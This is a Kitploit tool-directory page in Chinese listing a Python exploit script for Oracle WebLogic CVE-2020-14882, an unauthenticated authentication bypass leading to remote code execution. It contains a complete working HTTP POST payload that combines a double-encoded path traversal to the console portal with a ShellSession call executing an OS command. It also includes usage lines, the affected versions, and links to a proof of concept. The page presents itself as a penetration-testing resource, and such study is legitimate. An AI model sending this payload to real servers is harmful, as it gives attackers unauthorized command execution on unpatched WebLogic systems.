Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Weblogic_Unauthorized-bypass-RCE — 基于 Python 的 Oracle WebLogic CVE-2020-14882 未授权绕过 RCE 漏洞利用脚本。通过向控制台门户发送精心构造的 HTTP 请求,测试身份验证绕过与远程代码执行。 | Kitploit
工具/GitHubGitHub/ludy-dev/weblogic_unauthorized-bypass-rce
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubludy-dev/weblogic_unauthorized-bypass-rce

Weblogic_Unauthorized-bypass-RCE

基于 Python 的 Oracle WebLogic CVE-2020-14882 未授权绕过 RCE 漏洞利用脚本。通过向控制台门户发送精心构造的 HTTP 请求,测试身份验证绕过与远程代码执行。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
8125年前尚未审核

(CVE-2020–14882) Weblogic 未授权绕过 RCE

(CVE-2020-14882) Oracle Weblogic 未授权绕过 RCE 测试脚本 支持 Python3

请求

POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: <Target IP>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 128

_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('ipconfig');");

测试脚本使用 pcre 检查响应数据。

用法

- 7001/tcp(WebLogic 默认端口) 
Oracle Weblogic Auth Bypass RCE(CVE-2020–14882).py <Target IP>

- 指定端口/tcp 
Oracle Weblogic Auth Bypass RCE(CVE-2020–14882).py <Target IP> <port>

受影响版本

WebLogic 10.3.6.0.0

WebLogic 12.1.3.0.0

WebLogic 12.2.1.3.0

WebLogic 12.2.1.4.0

WebLogic 14.1.1.0.0

PoC

https://github.com/jas502n/CVE-2020-14882

参考

https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf https://www.tenable.com/blog/cve-2020-14882-oracle-weblogic-remote-code-execution-vulnerability-exploited-in-the-wild

下载工具